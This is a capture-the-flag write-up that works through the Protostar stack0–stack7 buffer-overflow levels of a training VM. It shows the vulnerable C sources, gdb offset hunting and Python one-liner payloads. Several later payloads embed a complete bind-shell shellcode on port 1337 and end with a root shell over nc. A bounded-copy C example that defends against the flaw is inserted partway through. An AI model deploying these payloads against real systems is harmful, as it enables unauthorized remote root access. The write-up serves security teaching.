Protostar Stack Write Up

Protostar Stack0

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

Approach: overflow buffer to change the value of modified.

$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable

Protostar Stack1

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

Approach: overflow buffer to set modified to 0x61626364.

$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value
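Every level above and below shares one root cause: an unbounded write into buffer[64] by gets() or strcpy(). As an added example that is not part of this write-up or the Protostar sources, here is the same flag-beside-buffer layout with a length-checked copy in its place; the function names are my own.

```c
/* Added example: the stack0/stack1 layout (a flag next to a 64-byte buffer)
 * with a length-checked copy in place of gets()/strcpy(). Not from the
 * Protostar sources; function names are my own. */
#include <stdio.h>
#include <string.h>

/* Copy the first line of src (up to '\n' or NUL) into dst, which holds cap
 * bytes. Returns the number of bytes copied, or -1 when the line would not
 * fit, in which case dst becomes "" and nothing past dst[0] is written. */
int copy_line_bounded(char *dst, size_t cap, const char *src)
{
    size_t n = 0;
    while (src[n] != '\0' && src[n] != '\n')
        n++;
    if (cap == 0)
        return -1;
    if (n >= cap) {            /* no room left for the NUL terminator */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return (int)n;
}

/* Same shape as stack0's main(): the flag sits beside buffer[64]. With the
 * bounded copy the flag stays 0 for any input, because no byte is ever
 * written past the end of buffer[]. Returns the flag's value after the copy. */
int modified_after_copy(const char *input)
{
    volatile int modified = 0;
    char buffer[64];

    if (copy_line_bounded(buffer, sizeof buffer, input) < 0)
        fprintf(stderr, "rejected: line longer than %zu bytes\n",
                sizeof buffer - 1);
    return modified;
}

int main(void)
{
    /* Constructed input: the 68-byte line the write-up feeds to stack0. */
    char attack[69];
    memset(attack, 'A', 68);
    attack[68] = '\0';
    printf("modified = %d\n", modified_after_copy(attack));
    return 0;
}
```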

Protostar Stack2

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

Approach: overflow buffer to set modified to 0x0d0a0d0a. buffer is copied from the GREENIE environment variable, so it is enough to set that variable.

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2 
you have correctly modified the variable

This is the result when run locally on Ubuntu 16.04.

Inside the Protostar VM, however, it fails:

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name

The shell refuses to set a variable with that name.

Not giving up; let's try a script instead.

import os

os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')

$ python se.py 
you have correctly modified the variable

OK

Protostar Stack3

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

Approach: check the security mitigations.

$ checksec stack3 
[*] '/home/jc/pwn/stack3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Nothing is enabled, so all that is needed is to disassemble the binary to find the address of win and use the buffer overflow.

$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
   0x08048424 <+0>:     push   ebp
   0x08048425 <+1>:     mov    ebp,esp
   0x08048427 <+3>:     sub    esp,0x18
   0x0804842a <+6>:     mov    DWORD PTR [esp],0x8048540
   0x08048431 <+13>:    call   0x8048360 <puts@plt>
   0x08048436 <+18>:    leave
   0x08048437 <+19>:    ret
End of assembler dump.

The address of win() is 0x08048424; build the payload to pass the level.

$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Protostar Stack4

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

The code is really concise!
Approach: overflow buffer to crash the program, find the offset at which eip gets overwritten, and put the address of win() there.

$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA

Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

The offset that overwrites eip is 76.

gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>

The address of win() is 0x80483f4.

$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Protostar Stack5

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

Approach: check the security mitigations.

$ checksec stack5
[*] '/home/jc/pwn/stack5'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

Nothing is enabled, so it should be possible to control eip and execute shellcode. I found a shell_bind_tcp shellcode, 89 bytes long, listening on port 1337.

Generate a 200-byte test pattern.

$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

Run it.

gdb-peda$ r
Starting program: /home/jc/pwn/stack5 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')

eip crashed at 0x41344141 ('AA4A').

gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

The offset is 76.

At this point esp is 0xffffcec0, which is also the address we want to redirect eip to; its contents are:

AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

That is 120 bytes, enough to hold the 89-byte shellcode with room for a run of NOP instructions in front of it. Build the payload: 'A'*76 + shellcode address + shellcode.

echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Segmentation fault! Look at the core.

gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffceff in ?? ()

Check the memory around 0xffffceff.

gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf07: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf0f: 0x90    0x6a    0x66    0x58

Our shellcode actually starts at 0xffffcf00, not 0xffffcec0; fix the payload.

echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Still a segmentation fault! Look at the core again.

$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x90ffffcf in ?? ()

Check the nearby memory.

gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x6a
0xffffcf10: 0x66    0x58    0x6a    0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41    0x41    0x41    0x41    0xcf    0xff    0xff    0x90
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90

The \x00 byte of the return address we set, 0xffffcf00, is not in memory. Now I get it: the \x00 byte cannot be sent! But I put 16 bytes of NOPs in, so the return address can be shifted forward by anything from 1 to 16 bytes, right? Shift it by 1 and change the return address to 0xffffcf01.

echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc

Success!

In the Protostar VM the esp address is 0xbffffcc0.

$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root

In the Protostar VM I did not run into the mismatch between esp under gdb and esp when running directly.

Protostar Stack6

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

The return address is restricted so that it cannot point into the part of the stack we control.
Approach: the restriction only applies to getpath's own return address, which therefore cannot go directly to the shellcode. Instead, redirect execution to the address of getpath's ret instruction; with the shellcode address placed at the top of the stack at that point, the check is bypassed.

$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6 
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80

This time the offset to getpath()'s return address is 80.

gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84

The stack pointer is 0xffffceb0, at offset 84.

Build the payload: 'A'*80 + address of the ret instruction + return address for that ret (the shellcode address, esp+4) + shellcode.

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
Segmentation fault (core dumped)

Segmentation fault! Look at the core file.

$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffcebd in ?? ()

Check the nearby memory.

gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00    0x70    0xfb    0xf7    0x41    0x41    0x41    0x41
0xffffce80: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce88: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce90: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce98: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffcec0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcec8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffced0: 0xb4    0xce    0xff    0xff    0x90    0x90    0x90    0x90
0xffffced8: 0x90    0x90    0x90    0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4

Found the problem: our second return address should be 0xffffced4, not 0xffffceb4.

Also, after the run of 64 A's, 4 of the A's were replaced by something else. I don't understand this; if any passing friend knows why, please enlighten me.

Fix the payload.

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc

The above is the result of fiddling around on my local Ubuntu machine. In the Protostar VM, 32 bytes likewise have to be added to the stack pointer address. The esp I obtained was 0xbffffd20; +4 would make it 0xbffffd24, but a further 32 bytes must be added to get 0xbffffd44, which is the correct answer.

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

I tried running the payload inside gdb and found that inside gdb the 32 bytes do not need to be added. Is this a difference between gdb and running directly under the system?

Protostar Stack7

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

Approach: same solution as stack6.
Address of the ret instruction: 0x08048544
Start address of the shellcode: 0xbffffcd4

$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

Summary

Failure isn't scary; what's scary is not finding out why you failed.
